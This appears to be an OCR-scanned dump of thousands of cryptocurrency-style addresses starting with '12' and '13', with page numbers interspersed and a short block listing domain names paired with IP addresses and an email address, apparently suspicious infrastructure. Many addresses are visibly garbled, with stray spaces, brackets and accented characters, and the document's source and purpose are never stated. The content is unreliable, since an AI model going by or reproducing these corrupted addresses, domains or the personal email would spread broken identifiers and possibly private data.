12x4mMAFFNogYN6pw2i28VYfBw6fg3Qjcfv 
12X5DQiGa4faWa32EKLdF1QrpLNWvYudaz 
12x5Fmw8XmaHnow8zwzmQVYqDTP28VtLNV 
12x6airud5a53kiFfQsnGNYLCaB4RCvEr6 
12x7D3YtM7wkzDJdUNm4Ey1QCQY6e8zZNsf 
12xbAVH2v5aWyiz8LyCbgUGn3BHenCXGUT 
12Xbbe6GNzyRKYT9YirBycRFCCS6T9qwm58 
12xcHorawY3SSxa2a2ciav5n4dySnenhkP 
12xD8nkMHuAqwzba7gbanZznA6Mrw5MVxXh 
12xdb1Zt8rDJFjBY2GiSmv4Nhgrq3EwTk7 
12XfDz2YZVQSu8JZYQeXgXBD5tBGtMuSRy 
12XfgVdwGEWASY2xH3ZZpsMaDbhPhDPrRp 
12XgoyE4BPET4Uuj9XFXti7Y8zBjZewbXP 
12XiFJAQ7gvAGUAKsn5rMubjNQHu4iQ2fo 
12xJDfJSeVVZ1j9MQMGfvUdWEeCPhF 3qAr 
12xJRv6g5jUcs1QLxuXr8XMgFSXfjfj KL 
12xkY3XezVZUsetYYxutJ SUUSLQ2byyRB] 
12XRb5sdcoCKHnTCiVF5REBBAepoiLezQA 
12xtlvvQ5pjWqg11lqwiMqHaid7ydC3ksyP 
12xtgtb4vD5MizBaUEoRKVJdWYsS9EWAZ2bt 
12xUfXiQCIML64DL9rooPPRhuutbmVDAVM 


25273 


12xvE44rsAC5 7JgAw4c8yFyFeWFoT5ZQYW 
12XVTU257wtqptk5Zx6K6iyx4voUEinPdD 
12xW3Vp9vbjHfWhpAWN80XWHgRxsYwptTrn 
12xx2L4i32prDAjuagcLuc4hAZk9iV6kjq 
12XXSUBPgZm2jrSyL2jhLey5mV7fm9alLv 
12Y2draC13TRsL2HL3arafQNWZ83LDaemh 
12y3NDag3Tzxju4U30bxyJ6QHiaJwFSRju 
12Y4XiCKz9y4vgQrw3kKYCeZLoLFcNLyo} 
12Y4YQrwJFz1g8PB9jR5HA3MVLzZGJZZ5re 
12Y5x52WBNTMpYd2wQ2ENkEZHWyaUHOQfoi 
12y6q7LK52k1juHi8J66HUJbCHyfifv3cU 
12YA17dxFK9hZhbsHiSWxTFOWFBhZVKHJ3 
12yaNS8Y6yYv67nj22MACexpEPCfZ97fja 
12yAy5fdQ3EFyibpbvC1ER4o05rAwW)JxjfS 
12YB80tUqTCPSzZYhgVNJpDxWa7W56ixZXf 
12Ycm7kLDhobtjVixfWoBgqijjc8BKQHZYNs 
12YDw8y98eYV5kfDTgFneJLyJjA6Wbtlog 
12ydxiXKkvjgolhmm7nciHrnL9BaDPolej 
12yfpJcvBfysW67fatCKXqQvQV1RvTRSoh 
12YGwF2upxRow/7tmcQAbArZrcXYU5DQZn3 
12yi2JwJUXmBsFw2Cpb47LRDc8VPVaQajd 
12YJrfoPTCm3zJBNyJr8axjsmgMhbve65jL 
12yMEWPAcHrrBfL3NuQGZkjrs4YYrBxFtU 
12yMkNSsUeEdAx8wVvxxVetd2qQ6cGR16x 
12YmUg3Xe5AHQOt45MKG6ij4FcQyQpxLgrV 
12ynw8g5pq5yoHe7eqHLFSSwhAMywXS23p 
12YqE73h2UprohBt37drUkaC2xfdr6GPEt 
12yrdhpkZoaVp33vtYgPS8diYe6WYceu9U 
12YrdW1Hw/7tTLJPMRKatWeeb6Hog3v5nzk 
12YrRr5AvxXn8yDMgwhtChPaFZ5tQjaTWzW 
12YsTbmNJEetNwD3VY2UrQC97Kaa2xb5Df 
12YTfoeBXH4LRfum4rXssywByfQgHfkBX5 
12yTxceuXA3V1X7ARCPPFExc3XTU8mW2zqg 
12YujWobB4qSanghb6NHFNsx4stgoZZulE 
12YvBpeTPQJxnxn7btE56BpxKblAg6é4rjt 
25274 


12Yw8wxLWN1dPDRsFpxj7AA9SvsmoMEpYv 
12YWHNUSKt241MHAkKXG8RtATcDRiDTkApc 
12ywJLBBv3efDCTEMb4T4BFa4TkGDt2eEt 
12yY9ZruThLiwq2PY2gr6tNfD4CUS2jnZD 
12YyFLKc9nN3eweFm1tAgYLY1RrJYvuMD9 
12yzWvwsqkW6bAUY4pN2mrUmQo6hRjXujb 
12Z22GGbvhLG1W9coivfWntSVbdq2FWMLGT 
12Z3voSQmKJKA3SyxvbxXUo3yf3bJzcZU1S 
12Z5dAHP7GJjZsSYVHHVsmwjqQLREwHZaix 
12Z71WcLDC6pLQiyWATU2xx91455PeE3k 
12zax58nXMuuMvQzPYgSo3xyXFxzo89wds 
12Zc74n7PVYRdZCDH7jrmeEMvPmxX6zRNvf 
12ZDXtFGsKssDsZZYK4yqZujDjKX1LkDGt 
12zfLsKVctreQV1byjnc5Nupn7a151UM5u 
12ZGM2ybAAFPSmuRHq5 TewBK7 YeNoFSAEb 
12ZK22ydWiUWLVcG3DXZsX8crFMv82R9u6 
12zZLLd54RRPXzuSJEMBwQxi8JMjZ4Tb8u7 
12zmyqdNATE8L5PmVP3swmv66QzPRtAdwh 
12znnEMrDnfWgGJrvSS93sE9x3UufUCcQYk 
12zob8R4sUyE6kmdv3N6PZHE9VjRWx7mBj 
12ZR21tFk4QU8Bcqrndy3HoaLDTnzcYz6E 
12ZS69vUZWubRcaq9EJR7joPABjjvdUPkd 
12ZT7VNWS47GhE9Yg4ZKwan51PFSF2nKZa 
12zTecGqBj3x46LDDJHpoWFrADFqe4fzuS 
12ZuDv1p6q48K7Ftbsfxz282cDGwvVtw6o 
12ZVJKZ1WEyQF7RKHK5i6fYtM18CrrK7J3 
12zWkbSTuKKe2mKgKJrrmZ5hm2xCDZJsQC 
12ZxmYU2irl1EMHBaTvo78QanW99akTZ7Lc 
1311PgkoLQL8sM6Aj4By7s5yZ84Bp6p7cE 
1312BFRXbBPuuEQMZMQ7TY8vc1RvxfsFeU 
1313AX2Rwwvi3JeqwrM2dFRBwWNHaMZrqeP 
1314vNsxXf9rLio75EZw2W7YD5ACn9DMAph 
131A5tv5EW4exi3P9Zzmp7USYVV8TN8PJ3 
131B7qaZntQ225vHoLn1Vaikvw8SSL9gfE 
131bHDkT7qWwatUju60Ym504CnKFEiwLn6h 


25275 


131CecSMWRXQ2k26M663XTNKpFJ48Tybdo 
131h5K86zsgcvbR34PmY99dgyVhUvMexpz 
131kiPVLESTZpQYh6CYJQmEkcf63AVezuz 
131mMcUdz7DR6jjcSyVKqZmPdsESKTq2kC 
131uZsUJqmnhVKvRNbfywZbhqFanBseHHo 
131Vj5LD5kLpmamTH6hmZrDRyRtCw32ZwE 
131yABymMcHhCAo5PNo55FjQVxLoPQvcFv 
131Zdz6k3H3JVMN6MjJGn3ct8sddd7JVw4x 
1323gBq5uSCag6AHysyYZ4jgt9U5eJwH8Ar 
13262drAs98VXckZ4mqKPJUN1DKn9J6wgS 
1328jfXzmp6TMDUX6KMoydkftsBS1cc1to 
132BfzB9qgRttUTS4Ld13wITNnhFWP4AKgeg 
132dwQoxN1B7e9j37qnErDipkSLFUt7gMf 
132ehAv8jxzw5tEqRolfPs9GkU7DXo1lmPW 
132F3xLbJWo1iD5U4G2EMN97kNU3Tazupr 
132G6torpX7yuTqFnWXGAoxhs1WUeh7gjw 
132KJ1zvrCp42pkwxkhmm4vMCXcUiHyn79 
132KSGCQVWpyZ2UtjjfFobcwvvNtYW2anX7 
132MMAEPEAWiKmD9T2PTxMaHTdfc2TZoEn 
132q5uCtz5K2Lhb9zZQtss6zPMXfPYV49Gs 
132zZQtxH78tYcBmaQxaeKR5xz3dGwSCVXG 
132ZxukuY2tXcnodPUksvC2npwT8B3ZctJ 
1335eC6ZPkz2UtFCIHNCD2zrER4WMRvnjt 
1337ZwsNxDRrcFvWXvpQLeTMLijaa4Wpf2 
133B5s7QppQeFWxV4feeCj)DMMgRuCeKpEN 
133fgHEownRiVbg4kvKEU5pJ9vGWM8Wy2c 
133Goww4M9sBeMdiY4devtX42YGHjEgpg8 
133ri9B/MBt7g2dTZv9Aveo9Zmf8KxLjsr 
133ubSHV1WPGFFiagJNbHZBXiXZzwpkAGg 
133WM8s818PFqpXybeKrG2X3ZvXQuLqc5h 
133YoVOKhUbfVMiSbmMLQxVgA3dSXeoHD2R 
134c573zquAaYhWwyYpF6e1Usz4D8QGpmLd 
134DkJZUWVEPJLV61pFFCQckJPpb7rh16r 
134dKkFKScJsgwYATyAvVvojvYijZDvClo 
134gyNrUh9LY8U9fxpqvi2rV4EpE2AqeXxa 
25276 


134jzghYfsk2K2TaZcpsisLA52VGjPpKS6 
134NJM29kdxqr3udZvQEB145ZDtBp9tVEo 
134NnuzphmMw41Y58Ev4ETBxsFmeJDMh2d 
134VoMhiEwfKC5EYGc9XCebD1rmLdRXrYV 
134Xp6X5CmMhWG3fX]puw27E6NCRcmrsWKv 
134ZT5x6hP8AjZwxnUT59NMbkgisJdMm2u 
1351A8K3Ua6j8NAmFj44fTb4YiPGJMH4Jv 
1351CrofoYGX7RVJNnuwuHs8eQZPELCV27 
1352iVbb5X1nxNGmyU5nTt9sTrSRd2Zgcr 
135aFNhdY7QV2eDtBHiAaTFr4TDfv3cB8X 
135DWjtfDCgTY6qtjQw9z7Lhq7YZraMbqn 
135jPPmKf6vhm4ito74usYwxFoUeyGur3a 
135ncK6iR4xTgABNrvy5cwqzmgcrYY25Zk 
135q6mncnyY9upLGTvXjNRkKNgnKpbaG2GU2 
135q7vBMDqT7VPLj85PndhHHCwzdZ1Htgx 
135SJHfB8apCPVnb4Q8nD5EHXg5Y2AJ8b8 
135TPudvDJFla29yyKJnrqeBL9agjEQ9h4M 
135ydJLkKU9gLeNwlawkKsjKJcHLerY7idoY 
135ykFwZcV8AessATR7K25X44UJp5EYLQ5 
135Z9tnZuUCQDMHVvF 1ly6TvpSVF346GyzqfD 
1361A5UaissQkG7 7syxFCvSRAghhug6xQX 
1364cWSNbw3K21H2twizzMoLoQlgbghBrx 
1364WGgTRonBagj2VVwGwJEEod4YD]q7qy 
1364ZNgN3tPVt7BxGHWmDZ7dPu4VeptbCn 
13659PVfBdWyz78zgJUKEKyj3CbTnoTnxT 
136DqMVaHczHRrjVDJ9zZ6Sv8wovPqu5DaH 
136EUfPjyV1inR79tXztKJUHLgT5iUKb4MS 
136GSpMH6V3kEk17dR7QPXpgaUP7PGr9aT 
136Kesqqhgj4nyXbx24ZBrPM3aqXZT/qfl 
136LdWMKJ]XWgkyRfK4cSoQopEh2GWGcVmg 
136R9YkrH7EcSpvCusosqGH8V5igJgGexq 
136tcPeBEDaRYm657p5maqmpCQEmPMZyfw 
137b1ckrfPDFjW4FpDGj9qmHWhUBGufxs9 
137B8sD9yGjtKB270wbKMWFFI9PEjb8S2f 
137CBKSkg8qACjCLqwopQEK4xMim230Mza 
25277 


137ccile56KCNbMsUQvzab6NutuuYZtsoH 
137CPsz8N8GTkjSLMm5fnfXWNthvihyNJ8 
137N9gaWwogyATc8Uuayxj89ugUtbAINw7b 
137NdY5QmsaDmVa5CZHwkGeQYEqn1xxXidH 
137QptCvyxxT88jqDY3snjvSRqj14PgkWa 
137rz8LjrlHzsfwlepyDnDSCbP7dmJsXMA 
137s3Wdmm2BTjwwtvWGLHsZtppPYptbpxs 
137tDrDAoh24crIwNqTcAa3HanFVupE2dB 
137U5UiZjAto5TeZdCojMpxJYKEqoZXgKT 
1386DDsXwnqCFBfoPZtPEcpuYUWarRhBfs 
138dC9ZWKCBxF76B59tq8qyUhsFhJGRKfx 
138DR36JSscyzCPYBZHWMfSy7RyZMZdBMP 
138ds]pMk6c17WN8LzvG1CX8ZSER4FMviq 
138FyCQM8MbBWYI3pVhhwqmCvVFLpEcQpHv 
138HJsvydHvlubGXA2b3w57neqfogayQ3y 
138J5KaYmdtbAZw8XDbwgzUj9dJ45q9Rku 
138ne6NARCNYmMrDjA5UxwdTo5qyXzeoCg 
138pZn1lcWAuw83A2wCzfQpTrP9sigjhikc 
138sErQSypGdTkPv4iZbCe4nxhtziQQnNT 
138UXcWLm7j2CSN3pti9v76pNHgYpHcMiB 
138ys89e2NaWBsCE1fmpTaXFMH2TNk4hCr 
13924T507LE6pVrWMgkCYo5VvzewzP6D1)J 
1396QKJD9nN2G4Whkpj64NogMDYFDT5uMwi 
139952yHa9osf7CFPeDLjSm4t7DECdwkDe 
139ACUZ4wLr1hrFFSUiKNudvFXYiwdxzzd 
139AZf2cjjINNoVhvSjEyRoxp5 7dgjXQ8hE 
139EEJ9dFt4jJoMQ4UWUcXmSyQnyJoKTna 
139FJD8BHZHAKYwYNHscSaqgKZpFaYmRnoe 
139HY8NbKRnwQtBvmDC4yYw3TrUtmVGMSv 
139j8ZzZu2Y8diNW6AWSSiJDCF7qVekwADn 
139jZTW7Gy4KqceCtzq1BDTwVC62PpeF6a 
139k2YuKY58drKw8YD1NerJecgCKYC1LERX 
139nJFAFgLsTjX2L3DY6TphTR9Z2LLiLyZB 
139nwRWBfskGPfhVHAbzzvn6uiEbqCMxYQ 
1390NKG7Q6d8i2kR5D6bEZqnpm2Zcecizne 
25278 


139PRD9FNBsphTmcGqKD3XH6bjEAUMe94w 
139qpsRqDVxbx1T6tq5jRANhH3BqhpRtyQV 
139TRHFUxXsgosTVt7hoUB3wvShuYjMuc9 
139UjPETMBeRB7Um92pB2ejXPEhA7mp7J4 
139uWjrMgUEmSVdNLS7cSpzbVAkU7WQS1e 
13alH5shu5UtaUkQ91okVPdKYXXqpyVFyQ 


13a21iIW9mqD3GQgH3EkWXVWg4x6GqgXehd 


13A2RA2EQKmuAecbmSugkB5NFXQaCKSP 7} 
13a2ygdBCUxdkThXmqSX3uwjRn5KBF1lybj 
13A3Q7zYAYAJtyCRfyzr8SrWQTbuXPwGsi 
13aamk7Ao8giZHCMCUhfWgFD9SxjeN868d 
13aBPjnw6GpZim5JkucP3Adb68eEDifgek 
13aBZC3LNMvRhvxjuvuT3e3Dg6rZFJpkKN 
13ACj4p73q)wBfy23tq1H7pxpu7DtvVT 76F 
13AdDXwChjsXvNRqY8m6Bj4roG4nL9nxT}j 
13ag18H2UWhZXQtbz56ZpDpG3t6NndQ9xz 
13AGXggA3Efpc2q1Vz1d1la3Sv4LgCSRuBF 
13AhNNLH9j4g3jXsCbQ7n5ZAPMXxTCKRfhiT 
13AjLvUSikgz6iLLGGAsNLpVuypJWRsMM4 
13AmtkLwHmQZShGgac8h3]RuRyjgicngwk 
13anTMo3YLB3SbBWWroNnb2aotvurtaVgZ 
13aNTvRORD3WzZhAVclvpfSbA2v3RWFQy2P 
13a0kLyixSFghQeRnmRnpQWeEAtwEGukKEj 
13AqaQHKyzZU7S550Fc2062DPPPPsfL9ai7 
13arANjSRBiiWvbUppVtt2zvuE7ouBez4c 
13asPxfVm7ZaVCFF1Fux7k5jQMEJ6rmMhE 
13asTZR8VN5QVyHoyQLpKvxXSeVophyTDc 
13AU4N73kfWLPISM8VHM56HgxxuDK4fmrm 
13aVpNe6eunNhAn877K3YU9MYNq3cLX5AN 
13AWSjrTRUFXpNsbosJSDcavZVTv4RCF3e 
13Ay8dNwJF8iV5gNMF5k4k3dRV64TVoekw 
13ayc28k32x8LfX6fxXFMFINY19eFVQWsn 
13AyV4JmR1Fd78ebbR3GHoayybq2Jz2Hzt 
13azbzb1SH5UK7LttZcaqhawWPowAn6Jcv 
13aZXChD6yFux2dTBcY8C9q5mae5UvaFkK9 


25279 


13B4CXh3R7901PpRkXbFV9nKDpDBCUZL1Q 
13b4EwWchtdEFh9DyBDstqCC2LrusWgYws 
13B4z9sf3NcwopkcX2ZHz1leu67XgtHr3yR 
13b57DLycwCEGVfxXnyR4wi4XYGQ6G7kum6 
13B6iocmME51GjeSeu3z88hkmuZS5K7iNU7 
13BDhPgWTNeojKLFQTNtMS46d1mEzJ4o0Uc 
13BfRPvqNLWerZxbKXHhS3aUPyuvvhYZv7 
13bHVfGRKNdP7gWtDEm3MRoDAXiXCxGKoN 
13BieaYQGZDZjCtGuCo8xXfRF6éacPUeWoy 
13BJQix9hLGuCd6qDR89LZKDPiCUW6YvgL 
13bkaxDCAreSHxUroeB5pjn9ATM6sunxVK 
13BkxyVZSEHtVjw57XeSthwtHVEyfVjsmU 
13bLhHUFMG5H]sJXkz9WPvit9zZ3HQvofPlq 
13bMWAcFPB4tuRvte42yiyeittRSKfajac 
13Bo4Tp2M2yCcm3vctAqpSuDbHXtCiouEE 
13bosyohqeYXGHobpeRG4MUTvgHiRgPMKh 
13bPdd1KWNgA2Z8rTmZx6nLTZMn2SRRAXe 
13BtfVbVtj LMQ6AAoRvVS8rnjphWSYnUgtM 
13bUAWNxuS2Ni6f7pQDejxNnhVBZokYPxg 
13bUiIU9QPVB1u4ye4i8GSxagCVriTMLRLz 
13bUt8z0jMGa8JBZtmjucENBFmDy3Xhp9Y 
13BwQcuV9M618Z9pqxHXwb9YePuesYQen7 
13bZRWQNarfNodM9YAvEcRrjiopj4JRQM4E 
13c163ULPij 7M8iyDv52APhZjsvQLrqvWZ 
13C1kU376Qaents4be5EJEMYBtXyZLuGBL 
13c2ZEXZAYQd6XjMP2cGqPGWq7CSy185vz 
13c7BYywT6ypMilaWcB7CxRKsdbmdw9Wnf 
13C8ZQDbZUVLx6YKCRJ5Rc9jaHcZhgxbRd 
13C9wsrrKuAasC4nG8yohS2bNbF5mf7x7p 
13CB4gkRtww3y4n23TksaGupWgB9]YyXsa 
13CdBhz2fVY7BjAqkC9sR7SQNiTwjjr7bXxX 
13cebLAcYD9CzFokfRGedkbBxHHj2JfKzm 
13CEztgGeTyAQRkusnSQbigPDJZjm4nmLX 
13CGQF1JtomAVoZDwrogc72Ytxhi9WBsYh 
13cGW5ePuR5VECCZq8c7 7r32KPWCcME6VbQ 
25280 


13ciCP1K7X4T9AKCKUEZDiapMGAoHyetMN 
13CKGfSjE38Y1keddGJNZwE4PYwMhtrR3x 
13cLnsw4xSYmiBqcStL9edGhFkWdCxB93Y 
13CmKaQnDNnid22wkizGRoUmu7dN2iHSGE 
13cN8Zn606fqkghlmy4wDP8Bf9TH4qiGy9 
13cQNcPjJdSwLkT9ZGLhDW35ZtgYjQmtPaz 
13CQxvAkChKSmeN5hhyhkzuTBWenvZfmE5 
13CrFMACsu3UR7UUFWegAUcWFdFDbJe6M9 
13CRsD6k2cBu41i37kYuyREfGofG5V5xdS 
13csuUmMyxt2Q6TMNvvjrUDq3wMy8VuTQn 
13CSwccfjRS49ZxGHmXDwkKntfTEeRBNZnd 
13CT9aaRpDVIIFByhETevkM71SbtrDfZr9 
13CuEmZdp8nWbm8KGmMmYhj3boRcVs8azi4b 
13CvdTdfUiyUGzz2WAGswGCprGYangBBn9 
13CyijV1kA7yuXaGF1tMBXN1MqnHFPUUFp 
13cZhUyyt4w76cAXiufpUyqD44kBMig4zA 
13cZxHpV7qn2BU5jdHKgBai5bmR8c4dVWuy 
13D2NnY4h9Bhibrn72n5d2uvS5mMssgmb4D 
13d8k2S8xEZ4UHGf5 Yar9MJiUKfvvuJHNk 
13d8njds2tKXU7UTP4UvPvJ2xysei3PnYY 
13dAkszwyPHQY1VINY5kaFzZMUXytgT4eg 
13dayjUQuyW55eHrvq2U4dpNnhGCMookKuT 
13dBpwébitpTmMeshoRsgqapDJH6pMfsbS 
13DBz3ewtMoshjz5ZzC8wLqbR51EJA6M5v 
13DCPZjSBwHn5vnEDZTAxcuBrPieB9Y4eA 
13dd4iH1vjGkKSwrsaS64kDpbTXmK8MMtZ7 
13DeUeXzQ9T lawgqsorxnTza2mzMFXUAGVt 
13DhzudLvhtARUidyfAowUZSVG9dZdxtu7 
13Di6Q4bH5GS3Y5LknFujQZ9EF3n50CiaG 
13djraDxWvkLBAv]1Szfd1J3hSdkHYBeet 
13DKpot2reWM2Zni9iwfHZPPaDTaMwGszD 
13dkX4vmjcv7C8WjkcnJVjHADQU6D5s5Ho 
13DMmtRP1fxZeg6KLKKrSH4WxBYPUn2JNi 
13dMRZvf9HQ1UZJs9Lw5shFjz7kxbRaEWr 
13dnJfEE86F21HXmcedtut6e79nxXJgGaBe 


25281 


13dognmpD52Eo]X9wccebFpyN9jEFaqzK1 
13dpT6gUN8s1kWd7YABze8jwbqrcMcNhoF 
13drFeSFZF7RDNA7A1LWpSRW5Zr7DJxDJNe 
13DRT74StoyVQTJTcmtrK56Aerv1kYGzZBT 
13Dsi8jJeaYjX72DTTN9qxanEar7XbwY8Z 
13DSSebLBfyzqRiMadWBKgsp2YDYt9M1g} 
13dZ65j7U4Wx9T59bKQrHz5dJDnM2Kphdb 
13e4DVaLiSwLLTvM7zFA7gQTYwd5du49Eh 
13e71faUx71VoRKxsPtq4YPjLEd3VXwDMe 
13e9S5AS1e1ZZXW6V87sSHSyyrm9gDcNEHN 
13eaW7iAf676uF42Zvv9bp5KrZBbAVBd7U 
13eBd2zzsUWjBue3qyNYXzZ4xMGoSubaDe 
13EBNCM9nWDrgcrMapb8E2YWkGD25XH8eM 
13EBxfKxCfqB6w7 1bhd7twSBmEVR48qQof 
13echkfV54pw7fxN1lgkQmg5yV8FC4xx16T 
13EcrJL6EEyLe5jvad2mY3CveBEX5r6d22 
13eczzZWNEa4xPjWxnQVdVbVnUVEErQGC65 
13EEJQyB56ANKbwin8yYAGs9HwtcYA3fj 
13eeYLjh6z8XP8ZDumM5NzbDYAFWtMzbxtF 
13EFCW3TGma4ioSPSY2aKzBEUhBKSLMDFb 
13eFfYeTLz3y3vYp2BDr2f2QBdjYNEPHwr 
13egkJBwjdqEETfKFeJyK79VMST5ZRc2W6 
13EIRBWG58yy12AX4QBjkz5s5GMpCTC9Pq 
13EjJU3x5KbicytY3P6yvZde6HKaWE4krR1 
13envUEGi1d2PdErDVu8Wym7jcDhlYwgqKk 
13Eo0iag13L4eHVyRBGwK8R738HHJ5DNJ6d 
13e0KmMeak1u80NGYxUw66fNVVuUbhG82U 
13EQ3U233WEgkonYgFnjBJgWDdmQDcxyTf 
13eRTbbENz08X6pj412Bz14aySRULRrvDX 
13eSraGnhcQst6vMRuhYx6tvvM 7VrQP6B4 
13ESzmogeqbb3pLAuAfgZzxpxsMW6bGSRU 
13EU778DmM8CENXLH8qF36XKCQ4hjifoM1ir 
13EViINXFNVSXgPG6rngYmmMxwUidDk3sPB 
13Ex82QgzzcjCk2ic2NxTSqNihvkwhZkD5 
13EZEyGctFhT YazanCWHRb8f5UTjhkoMhY 
25282 


kowipe .net - 206.51.230.92 
kerobo .net - 206.51.230.90 
gelupe .net - 206.51.230.104 
fuquwe .net - 206.51.230.103 
hyduve .net - 206.51.230.200 
bisehu .net - 206.51.230.99 
wypule .net - 206.51.230.95 
xylucy .net - 206.51.230.97 
xulady .net - 206.51.230.96 
lyqyte .net - 206.51.230.94 


nimygu .net - 206.51.230.96 
zuziki .net - 206.51.230.98 

symiza .net - 206.51.230.99 
bisehu .net - 206.51.230.99 


msrxdk .com - 188.72.192.78 - Email: charlenecrewshgkn@yahoo.com 
kimuka .net - 188.72.192.78 - Email: charlenecrewshgkn@yahoo.com 


ylkbin .com - 188.72.192.81 


2531 


13EZHQWHbWpB82VsGjNXTRYDJ7JDnXSimh 
13f1VVEKEtBXTQdFNtszdKcdcy7McvHiG8 
13F25umjjoUEEM6TNMUniVG6cvMMJRdKDo 
13F3cgAZDoEcqqgJuY90DVFGkBVCourYD6w 
13f3EoxKXVCFe3VH1MRFL9eHJSbwiVQNWM 
13F3LCKCVW17DbbbsBEh434iLDZSbdQwg6 
13f5340iahX5BAjtYzpvpriNnrsjjV40nx 
13F6bdj8nRg7xVzZpN2e67iG65VQbVWw5G5M 
13fbQ3WeYtTwFYcQuvmYaZMMH4Sn7iFmMUo 
13FE8Mm4eSrDT6VnqVtwj6jitLJ|k7szqjK 
13ff5Vv4eHsaTzViFWEiwWo]XN6Wa3a6fH 
13fG7xG9XMJW3qbUZ1273f6E5yquULMYQqN5 
13FgkrHAJ773tDjaK1lxbruaRHMnA3qUWct 
13FkcSMpkZSmL605w7996fhS1Hf75R8UqQ 
13fndVVKUVaqjW3H2)FZKKZN8JhvLk7cQjZ 
13fof7dGTJJZvwmE2EJG6Na3wK4AMnCEVi 
13FpGQNkCBuenSGJshriJ9aXJuZHZgVyig 
13FpkWv22bG74xUEMtBPaVYzy89ojLz8Hk 
13fq2c1GiBw3FLCQk33CnCZUVavWzimV1Wp 
13fQQSCoaxJcMZE2ZARMGVeqoMPnh73M56p 
13fR4CV43Nv8rji4z971uU87EY9rWvWnVqk 
13FS9QZKXVpSpeyPqKuW8SsDitkXZJUhv1 
13fTg2mevSg64miyhwa7oeGEtaqrwplvZi 
13FTroVcnepM6VKVQvrK7RfMgPnqYYn292 
13fUcRictbUDVfHqLrUBMssnnZyYr8bKGi 
13fUK6LJuCNUfFnaRpF 7UWGVVRfGmEaTg7 
13FvDta5YyWybjLqSCLpRQWe35FPxozMgt 
13f~W2frbJm1x13Jozsng77iaWx4cAvSBxz 
13FwiMEgjELrDQyesuhemkWVd28j9BAGAF 
13fZBWZwewW85BgokKuvzofzcKdcT35ozt 
13G1CcETSI4GNMAUNPZYXo8SNTX1Fbeh2So 
13G1TD7chf6Lz5rT6bYUDkzzxCDYqauchs 
13g5if6CTW7SupuJZzZAk7tVRhYZFHO9bHo 
13G7piifZeKPFKtSwVF9LDjShP5rDrK88Y 
13g8ZKXC2KJWVgMsoorusxNVq6jcqhF3Yu 


25283 


13G9L7VicDBN4NcZtNqlLq7WQ2yQLavV84s7 
13gajygotE3ptlkraJ4Qqis7Q9eRYxWeNB 
13gD768HPBccnkRS58qgHCqqqzkEEuFTWV 
13gdHeQcQsJii¥qzjQu5har3uAtsYACy1L 
13gfcLSixcPFKio LUYFYUNj3g2ackjb7Nd 
13gg6upXNMoj4qN4NFUxunT8HuRkt8yPBm 
13giyyuefAg3dFkQTDc5rcgXQ61Fdrc26n 
13gkNqsN5k6wGsraCyjchYP3EyXnscWr9j 
13gMG7ChTVbE807yGiiKaVmhg6a9SpB TwC 
13GpXwNEaxvN6psufB5PgaqkYbzh3RdQG7 
13gqnyMfn4gSVqkK4FgEA5EKpobuoYfSgZz 
13gqqcPXSg4n5pgmn4P1kguLGe6uD3ZxnA 
13gRpzPF3NtRhdMiYZ4BLovWyJBkqBKH3i 
13GtVnzFsZAbAANQRjpgGZWN9aWfQ4Wvbt 
13gtZHXqUGZEFu2PngrUkoC4whcJADECDb 
13GUMM1lubucviMbUPjZfqBzF4PkuBbz96U 
13gVm87cmN4wxXaqftNso2JExSfAhsvp3qAC 
13Gwun8pbjk9nWUTe7cGL1iqv5KZ9k2g5Er 
13GxapD7ZT5DoKS6MDFRfVi4Yy8gmKzdGp 
13GyJdiYM3bba2YackKtL1QjkQjTRxuLcWj 
13h1rKQ3saYNM2wNZCqXVRav77jCmVwmZA 
13H3Q5p2jfwUVRxfGPsDZ1vYqxhgMsHhuu 
13H4PNbVtDageThfPg8eLh1RGpE9dsULpr 
13h9NwmkKugziE6ePDMMexw1PGSmyiyYorCT 
13hbCgy6ecm4AABsrd1Mw9uEXmDYf1Bx1Q 
13hHDHGhHkmQNDqo8YDEalTWgnivkd9pvvZ 
13hEnjCrcls2QzoUvdEzubbaTSs7viWAyf 
13HgoZUFePSCrEYd8F 1lijvRYgezPDZ2k1ly 
13hHVGHDHSjk7yrLMomaqtel11iSrS7rerZn 
13HjWG8SgisBWxi2pjygVomabBePpfebWQ 
13HJWMJn5QcBjpSHxc3WLXH5NX52ABRidM 
13hjwmyR1SJhDUalGfjR3EStxFivV7r9XQ 
13hM16pwXk361FXL7sZUGnNBDFp8VKQueg1 
13HpwfVHaWEy5DvWX7Wp9aYx6FTobFAaQ1 
13Hq7P4S55a9BMeqd4wuVEK3icQcApCnhP 
25284 


13HrfY9H9S9yCnNUEGIMpYEZ3inUnRPnMQ8 
13htLpbAJXqSYusEMHXo9SNgHx4gtzVVhj 
13huZEFFaCX7c89zQoaRT3YRIrwebZD1lqga 
13hVdpxD7TFxcU2HRwdScrGwBxU7uJnarg 
13HvkTi4h6UL5TyempcfHCihiQ3fMkMf72 
13Hy8mzsxKo7MLZA2W9p5qnA6SjwUChijv 
13hyPoUKJ6enrxjEHCXAN9dPvtHW9A6wXT 
13hyWF5gWw7JKVC4eUTZUtR9IFZ59M36WDdji 
13HZxflwDxyy2ChbBj9ENg9kZJwxMQuYAZ 
13hzySkobw5GM8DGtJ6FQmajFyhwT9Vf2Mm 
13i6KrWacpvK8XifwxJHmf4Uh9j3LGVS9U 
13i17Ytksd3JZRSBbsx7QVuQ2aL7waSmRHr 
13iCsrN20gMxKEdCCC6eWUXz2NSHgAAv]Js 
13ieEf46P5D876qG4Tf6rDHPAFZs8AtD3R 
13iG5wt88UzZ9iIMyWieKuaUhypBbYg8wLDU 
13iiJusex4Dr3x9HcZZnSUGepJukGbwyYzk 
13iNMUUY99TXLUMRUQQgB7qXpiWPHtaEeh 
13i0q2mmeLCMEjBBAPKvPjErusHf4qeumT 
13iPG2JdveZtTGKmu15W3RVmI1CoH1f6Eqw 
13irkx3LHJ9mXe8qgpcazJ27)xFpmfdeng 
13ivwexw9Yw1lmGsEUfP258Px2AtWn5KxdY 
13J)1lgbDW4KzGChedx4VdKhuGiqZZvH4n2W 
13j5hN6Ct)dXi3pEQYqm9pnrJ|qgCNkU97au 
13j6Rkaj4cUHngXT 7Lyfrg85Zo85mpG3xi 
13ja296dgi76vyiKk844wYYarV6XH2M48C 
13jcDCcGsA3KhsYXxH9jjuClyms5]Brjdf 
13jCVEEJFdY5xluw2mkAT97DLPSYoVYP8x 
13J)dGVZhoB2JTrzMDSeWU9qYtvrRw52BGV 
13JebneVUcXCZwjN9LbRSEf90RKdHGhEC) 
13JEF1Tfe8S5zyBws2N6qG7fcpbELdLg4f 
13JEsTGaAzogDBAgEreKYtPEnsnKnwRxDb 
13jFSSVF2U9KE9xhDA5ausUBsYd3dtv50X 
